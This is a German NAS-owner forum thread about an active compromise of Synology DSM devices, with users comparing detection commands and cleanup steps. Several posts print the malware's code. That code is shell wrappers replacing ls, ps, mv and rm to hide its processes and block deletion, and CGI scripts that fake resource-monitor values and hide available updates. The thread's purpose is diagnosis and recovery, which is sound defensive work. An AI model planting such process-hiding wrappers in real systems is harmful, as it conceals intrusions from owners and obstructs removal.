Aktive Hackangriffe auf DSM Versionen kleiner 4.3.-3810 Update 3

Status
Für weitere Antworten geschlossen.

F0x123

Benutzer
Mitglied seit
22. Mrz 2012
Beiträge
62
Punkte für Reaktionen
1
Punkte
8
ok danke, dann muss ich einen Reset durchführen. Und ich brauche davor sicher nicht alle in Volume1 gespeicherten Daten vorher auf eine externe HDD zu sichern? Wird nur die Systempartition gelöscht und neu aufgesetzt?
 

borg2k

Benutzer
Mitglied seit
08. Mai 2012
Beiträge
1.789
Punkte für Reaktionen
0
Punkte
0
1. Jain
2. Ja

Normalerweise wird die Datenpartition nicht angetastet, aber ein Backup sollte man trotzdem immer haben, denn es kann immer etwas unvorhergesehenes passieren. Wenn du kein Backup hast sind dir deine Daten eh nichts wert. Dann versteh ich allerdings deine Frage nicht. :D
 

Trigun

Benutzer
Mitglied seit
24. Jun 2012
Beiträge
2
Punkte für Reaktionen
0
Punkte
0
Sorry, dass ich es gestern nicht mehr detailierter beschrieben habe. Ich kann den Beitrag leider auch nicht mehr ändern.

Also jetzt:
1. SSH aktivieren über Systemsteuerung
2. Per Putty (SSH Client) verbinden, User root, Passwort wie für Admin-Account vergeben (Sicherheitswarnung wegen SSH beim ersten Verbinden mit OK/Yes bestätigen)
3. Die Befehle wie hier angegeben einfach nacheinander ausführen (per rechtsklick einfügen in das Fenster). Erwartete Ausgabe schreibe ich dazu:
[...]

more /usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade.cgi|grep false
<== "echo '{ "boot" : false, "success" : true }';" sonst nix
[...]

Hallo zusammen,

bei allen Befehlen kommt raus was soll ... lediglich hier gibt es ein "false" statt wirklich explizit "echo '{ "boot" : false, "success" : true }';".
Ich hatte nen Befall mit Prozessen "lolzm", "lolzb" und "synolog" in nem Verzeichnis "lolz" etc., die nach ner Androhung eines Updates (hatte eins für die 1813+ manuell einspeisen wollen - die Automatik sagte zwar zu dem Zeitpunkt, dass es ein Update gab, aber dem vertraute ich nicht, gab dann natürlich ne Fehlermeldung wegen Inkompatibilität zur 1812+) dann weg waren, woraufhin ich das Zerzeichnis /lolz gelöscht habe und nach nem Neustart die neue (richtige) DSM version drüber installiert (keine Neuinstallation, ich weiss ...) hab.

Danach waren keine auffälligen Prozesse mehr erkennbar, auch nicht mit htop, das ich als Alterntive eines ggf. verunreinigten oder umgebogenen top installiert hab... sieht soweit also alles sauber aus - bis auf diese kleinigkeit.

ja ich weiss, dass eine neuinstallation sicherer ist, aber habe erstmal schauen wollen und den webzugang von außen erstmal unterbunden bzw. vor dem update komplett die DS nicht ins internet gelassen. Die Frage ist, ob es in diesem Fall wirklich notwendig ist, das komplette system neu einzurichten - sinnvoll wäre es natürlich (grad wenn keine Nutzdaten gekillt werden). Danke für alle Einschätzungen :)
 
Zuletzt bearbeitet:

F0x123

Benutzer
Mitglied seit
22. Mrz 2012
Beiträge
62
Punkte für Reaktionen
1
Punkte
8
Backup ist da, nicht der aller neuste Stand, daher fragte ich. Sonst mache ich noch ein Fullbackup.

Applikationen wie Owncloud sind aber weg nehme ich an.
 

Michael_P

Benutzer
Mitglied seit
26. Dez 2012
Beiträge
34
Punkte für Reaktionen
0
Punkte
6
Hallo Leute!

Habe mir jetzt so gut es geht die englische Seite und diese Thread durchgelesen - aber für mich als nicht sehr versierten Anwender öffnet sich kein Gedankenfenster. Das mit "Putty" habe ich verstanden. Aber wie verbinde ich mich als Admin? Hier scheitert es bereits. Wer kann mir weiterhelfen? Vielen Dank!
 

Michael_P

Benutzer
Mitglied seit
26. Dez 2012
Beiträge
34
Punkte für Reaktionen
0
Punkte
6
Hi nochmals!

In der Zwischenzeit wurde auch ich bereits ein wenig schlauer (man glaubt es kaum ;-)) Habe mich jetzt via Putty verbunden und in der Command-line die ersten Befehle eingegeben. Bei find / -xdev -user 502 springe ich ohne Ergebnis in eine neue Zeile. Bei cd /PWND/ bekomme ich "-ash: cd: can't cd to /PWND/". Bin ich jetzt betroffen oder ist bei mir alles ok?

Danke für ein kurzes Feedback :)
 

laserdesign

Benutzer
Mitglied seit
11. Jan 2011
Beiträge
2.549
Punkte für Reaktionen
47
Punkte
94

Michael_P

Benutzer
Mitglied seit
26. Dez 2012
Beiträge
34
Punkte für Reaktionen
0
Punkte
6
Hallo!

@ laserdesign: danke! Jetzt bin ich mal beruhigt.

und jetzt werde ich gleich gesteinigt: bei mir läuft dsm 4.1-xxxx. Ich habe jedoch nicht die Option für eine Aktualisierung. Bei mir sieht es wie folgt aus...

Screenshot 2014-02-22 13.21.14.jpg

Jemand eine Idee warum?
 

laserdesign

Benutzer
Mitglied seit
11. Jan 2011
Beiträge
2.549
Punkte für Reaktionen
47
Punkte
94

STRYKER

Benutzer
Mitglied seit
03. Sep 2012
Beiträge
85
Punkte für Reaktionen
0
Punkte
6
Hallo

Ich bin jetzt nicht sicher ob ich betroffen bin von dem Hack oder nicht.
Mir ist aufgefallen das der Systemmonitor auf einmal ungewöhnlich niedrige Werte anzeigt die so eigentlich nicht sein können.

Doch die Liste von Tscherno gibt erst mal keine entsprechenden Resultate außer bei den More Befehlen.
find / -xdev -user 502
nichts gefunden

cd /PWND/
-ash: cd: can't cd to /PWND

killall PWNEDm

no process found

killall PWNEDb
no process found

more /usr/syno/synoman/webman/modules/ResourceMonitor/top.cgi

#!/bin/sh
/usr/syno/synoman/webman/modules/ResourceMonitor/.top.cgi | awk -v RS='[^\n]*\n*[^\n]*(httpd-log.pid|dhcp.pid|.top.cgi)([^\n]*\n){6}' '{print}' ORS=""

more /usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade.cgi|grep false


/usr/syno/synoman/webman/modules/ControlPanel/modules/.upgrade.cgi | sed -e 's/\("available_for_download" *: *\).*,/\1 false,/'

more /usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor2.cgi

rand1=$((RANDOM%10))
rand2=$((RANDOM%10))
rand3=$((RANDOM%10))
rand4=$((RANDOM%10))
rand5=$((RANDOM%10))
rand6=$((RANDOM%10))
/usr/syno/synoman/webman/modules/ResourceMonitor/.rsrcmonitor2.cgi | sed -e "s/\(\"15minLoad\" *: *\)[0-9]*\(,*\)/\1$rand1\2/" -e "s/\(\"1minLoad\" *: *\)[0-9]*\(,*\)/\1$rand2\2/" -e "s/\(\"5minLoad\" *: *\)[0-9]*\(,*\)/\1$rand3\2/" -e "s/\(\"OtherLoad\" *: *\)[0-9]*\(,*\)/\1$rand4\2/" -e "s/\(\"SystemLoad\" *: *\)[0-9]*\(,*\)/\1$rand5\2/" -e "s/\(\"UserLoad\" *: *\)[0-9]*\(,*\)/\1$rand6\2/"

grep LD_PRELOAD /root/.*
Keine Ausgabe

grep LD_PRELOAD /etc/*
Keine Ausgabe

Wie schlimm ist das jetzt ? Reicht da ein update oder doch lieber komplett neu ?
Weiß jemand ob auch die verschlüsselten Ordner eingesehen werden konnten ?
 

OSRA_Ackermann

Benutzer
Mitglied seit
22. Feb 2014
Beiträge
4
Punkte für Reaktionen
0
Punkte
0
LOLZ hat mich erwischt ...

Hallo zusammen,

ich habe eine DS411slim mit DSM 4.1.2668 (wobei der Update-Manager behauptet das sei das Neuste)

So wie es aussieht hat mich LOLZ erwischt, zumindest habe ich das entsprechende Verzeichnis
mit ein paar Dateien (die ich inzwischen in ein anderes Unterverzeichnis verschoben habe).

Trotz reboot habe ich immer noch einen ungebeten Gast ...

Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 192.168.178.24:33451 93.174.95.67:3344 ESTABLISHED 5576/httpd-log.pid

Die Ports 5000-5001 habe ich über meine FritzBox dicht gemacht. Offen sind noch

Bezeichnung Protokoll Port an Computer an Port
HTTP-Server TCP 80 DiskStation 80
FTP-Server TCP 21 DiskStation 21
DiskStation_MySql TCP 3306 DiskStation 3306

An dieser Stelle die Frage:

a) was kann ich tun ohne einen Reset?
b) wenn ich ein Update einspielen muss, kann ich dann die 4.1.-2668 mit der letzten 4.3.er
Version updaten?

Jede Hilfestellung ist willkommen; im Voraus besten Dank.

MFG
OSRA.Ackermann

PS: Auf meiner NAS hoste ich eine Web-Site mit historischen Dokumenten.
 

OSRA_Ackermann

Benutzer
Mitglied seit
22. Feb 2014
Beiträge
4
Punkte für Reaktionen
0
Punkte
0
Weiss jemand, was "SYNOTunnel" macht?

Hallo zusammen,

noch ein paar Erkenntnisse über meinen "Freund" :

Im Verzeichnis /bin werden die folgenden "busybox"-Kommandos ersetzt:

So sollte es sein:

drwxr-xr-x 2 root root 4096 Feb 22 20:24 .
drwxrwxrwx 23 root root 4096 Feb 22 16:13 ..
lrwxrwxrwx 1 root root 7 Mar 7 2013 ash -> busybox
-rwxr-xr-x 1 root root 1589952 Dec 11 2012 busybox

So ist es:

-rwxr-xr-x 1 root root 65 Feb 19 04:49 ls
-rwxr-xr-x 1 root root 110 Feb 19 04:49 mv
-rwxr-xr-x 1 root root 65 Feb 19 04:49 ps
-rwxr-xr-x 1 root root 110 Feb 19 04:49 rm

Kein Wunder also, dass man die entsprechenden Prozesse nicht "finden" kann!

Und das ist der Inhalt der ersetzten Kommandos:

OSRA_DS411> more ls
#!/bin/sh
/bin/busybox ls $@ | grep -v 'httpd-log.pid\|dhcp.pid'

OSRA_DS411> more mv
#!/bin/sh
if echo "$@" | grep "httpd-log.pid\|dhcp.pid" 1>/dev/null 2>&1 ; then exit 0; fi
/bin/busybox mv $@

OSRA_DS411> more ps
#!/bin/sh
/bin/busybox ps $@ | grep -v 'httpd-log.pid\|dhcp.pid'

OSRA_DS411> more rm
#!/bin/sh
if echo "$@" | grep "httpd-log.pid\|dhcp.pid" 1>/dev/null 2>&1 ; then exit 0; fi
/bin/busybox rm $@

Und wenn man dann "/bin/busybox ps | grep /httpd-log.pid" ausführt, findet seinen "Gast";
ich habe die entsprechenden Prozesse gekillt.

In "/var/run" findet man dann auch das entsprechende "executable" httpd-log.pid ...

OSRA_DS411> /bin/busybox ls -l htt*.*
-rwxr-xr-x 1 root root 166684 Feb 19 04:49 httpd-log.pid
-rw-r--r-- 1 root root 5 Feb 22 16:14 httpd-sys.pid
-rw-r--r-- 1 root root 5 Feb 22 16:14 httpd-user.pid

httpd-log.pid habe ich verschoben und die execute-Rechte aufgehoben.

Interessant ist noch, dass an Ende der Datei /etc/rc der folgende
Aufruf befindet:

if [ -f /.memtest -a -x /usr/sbin/syno_memtester.sh ]; then
swapoff $SwapDevice
/usr/sbin/syno_memtester.sh &
fi

fi # DISKLESS

SYNOTunnel

exit 0

Weiss jemand, was SYNOTunnel macht und/oder wo das zu finden ist?

Und noch eine Frage zum Schluss:

Wie stelle ich die SymLinks auf die "überschriebenen" busybox-Kommandos wieder her?

(ja ich weiss: mit ln -f -s /bin/busybox rc ... aber das hat irgendwie nicht geklappt; wenn also jemand
rein zufällig die korrekte Syntax für diesen Fall zur Hand hat, wäre das super.)

Besten Dank im Voraus!

MFG
OSRA.Ackermann
 

Matthieu

Benutzer
Mitglied seit
03. Nov 2008
Beiträge
13.222
Punkte für Reaktionen
88
Punkte
344
Die 3306 nach außen zu öffnen halte ich für sehr gefährlich. Der MySQL ist nicht dazu gedacht im Netz zu spuken ...
Wie schon geschrieben hat sich die Schadsoftware seit ihrer ersten Entdeckung rasch entwickelt. Es ist also vollkommen unklar welche Namen sie momentan angenommen hat und was sie noch alles an Zielen verfolgt. Alles außer einem Reset ist in meinen Augen grob fahrlässig, weil nicht garantiert werden kann dass alle Rückstände entfernt werden/wurden.
Auch ein Reboot ist zwecklos, weil die Software wohl mit ziemlicher Sicherheit nach dem Hochfahren sofort wieder nach Hause telefoniert. Interessant finde ich ja auch das manipulierte rm-Kommando. Es dürfte also verdammt schwer werden, die Originaldateien wieder rein zu bekommen wenn sowohl ls als auch rm ersetzt worden sind und nicht mehr tun was sie sollen ...

MfG Matthieu
 

OSRA_Ackermann

Benutzer
Mitglied seit
22. Feb 2014
Beiträge
4
Punkte für Reaktionen
0
Punkte
0
Hallo Mathieu,

ich muss gestehen, ich bin noch ein ziemlicher "Frischling" im "NAS-Geschäft", von daher noch eine Frage:

Beim RESET wird DSM neu installiert - richtig?

Bleibt volume1 dann aussen vor oder muss ich dann mein Backup zur Wiederherstellung bemühen?
Wie kann ich es erreichen, daß nicht 4.1.-2668 eingerichtet wird, sondern direkt die neuste Version 4.3.-* ?

Nebenbei bemerkt setzen all diese Maßnahmen, die der/die Angreifer hier umgesetzt haben eine ziemliche kriminelle Energie voraus.

Da stellt sich mir die Frage, ob ein entsprechender Strafantrag gegen die Urheber der Attacken hier nicht angebracht wäre?

In diesem Sinne
OSRA.Ackermann

PS: Und für einen Hinweis zu den Fragen besten Dank im Voraus!
 

STRYKER

Benutzer
Mitglied seit
03. Sep 2012
Beiträge
85
Punkte für Reaktionen
0
Punkte
6
So ich bin nun auch etwas weiter.
Da die oben beschriebenen Möglichkeiten zum erkennen wohl nicht mehr sicher sind da sich der Hack wohl mittlerweile ziemlich verändert hat ist mir ein weiteres wichtiges Indiz für einen Befall aufgefallen.
Wem im Systemmonitor ungewöhnliche Werte auffallen startet einfach mal den Synology Assistenten und startet da den Ressourcen Monitor. Während auf der Syno Oberfläche 10-20% zu sehen sind wird im Assistenten 95-100% angezeigt.
Der dafür verantwortliche Prozess wird nirgends angezeigt.
Außerdem war die Direktory Anzeige in Putty vollkommen anders als normal (keine farblich Darstellung) und die Box ist nicht mehr in den Ruhemodus (DS413) gegangen.

Krass finde ich ja auch das es wohl auch möglich war auf den Verschlüsselten Bereich zuzugreifen. Da fragt man sich wofür dann so eine Verschlüsselung überhaupt gut ist. :(

Nach einen Update auf die aktuelle Version kann ich keine Spuren mehr von dem Hack finden.
 
Zuletzt bearbeitet:

Matthieu

Benutzer
Mitglied seit
03. Nov 2008
Beiträge
13.222
Punkte für Reaktionen
88
Punkte
344
Krass finde ich ja auch das es wohl auch möglich war auf den Verschlüsselten Bereich zuzugreifen. Da fragt man sich wofür dann so eine Verschlüsselung überhaupt gut ist. :(
Wie kommst du darauf? Wenn das Verzeichnis nicht eingehangen war, bestand IMHO auch keine Möglichkeit für einen Zugriff. Wenn man auf die Daten zugreift, müssen diese logischerweise entschlüsselt werden, womit immer eine Schwachstelle entsteht. Die lässt sich aber nur vermeiden wenn die Applikation selbst in der Lage ist verschlüsselte Daten zu verarbeiten (bspw. Office).

@OSRA_Ackermann: Bei einem Reset wird das Betriebssystem komplett neu installiert. Danach wird eine Installation vorgenommen die der bei der Inbetriebnahme sehr ähnlich ist (auch wieder über den Assistant). Da kann man dann als pat-Datei auch eine aktuellere Version einpflegen.
Anzeige gegen unbekannt dürfte nutzlos sein, weil es sehr schwierig ist den Ursprung bzw. die Urheber zu ermitteln. Die "Kontroll-Server" sind ebenfalls gekaperte Server ...

MfG Matthieu
 

Madberlin

Benutzer
Mitglied seit
30. Sep 2013
Beiträge
24
Punkte für Reaktionen
0
Punkte
0
Wenn ich ein Reset gemacht habe und das neue DSM aufgespielt habe, kann ich dann meine Sicherung der Einstellungen/Konfigurationsdatei im DSM wieder zurückspielen oder habe ich dann den Hack evtl. teilweise wieder drauf? Möchte nicht unbedingt alle Einstellungen und User neu anlegen. Gruß Madberlin
 

Matthieu

Benutzer
Mitglied seit
03. Nov 2008
Beiträge
13.222
Punkte für Reaktionen
88
Punkte
344
Die Konfigurationssicherung ist eine reine Textdatei. Ich denke es ist höchst unwahrscheinlich dass der Schädling es schafft sich da einzunisten.

MfG Matthieu
 
Status
Für weitere Antworten geschlossen.
 

Kaffeautomat

Wenn du das Forum hilfreich findest oder uns unterstützen möchtest, dann gib uns doch einfach einen Kaffee aus.

Als Dankeschön schalten wir deinen Account werbefrei.

:coffee:

Hier gehts zum Kaffeeautomat